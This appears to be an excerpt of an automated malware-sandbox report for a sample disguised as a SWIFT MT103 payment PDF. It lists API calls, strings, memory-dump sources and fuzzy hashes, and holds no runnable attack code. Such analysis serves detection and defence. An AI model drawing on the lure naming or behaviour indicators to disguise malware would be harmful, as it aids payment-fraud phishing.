                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: htonsinet_addr
                                                        • String ID: 255.255.255.255
                                                        • API String ID: 3832099526-2422070025
                                                        • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                        • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                        • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                        • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                        APIs
                                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                        • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 455545452-1403004172
                                                        • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                        • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                        • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                        • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: InternetOpen
                                                        • String ID: <local>
                                                        • API String ID: 2038078732-4266983199
                                                        • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                        • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                        • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                        • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                        APIs
                                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                        • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 455545452-1403004172
                                                        • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                        • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                        • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                        • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                        APIs
                                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                        • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 455545452-1403004172
                                                        • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                        • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                        • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                        • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                        APIs
                                                        • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                        • wsprintfW.USER32 ref: 004560E9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend_mallocwsprintf
                                                        • String ID: %d/%02d/%02d
                                                        • API String ID: 1262938277-328681919
                                                        • Opcode ID: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
                                                        • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                        • Opcode Fuzzy Hash: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
                                                        • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                          • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                        • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                        • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                        • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                        • PostMessageW.USER32(00000000), ref: 00442247
                                                          • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                        • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                        • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                        • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                        APIs
                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                          • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Message_doexit
                                                        • String ID: AutoIt$Error allocating memory.
                                                        • API String ID: 1993061046-4017498283
                                                        • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                        • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                        • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                        • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E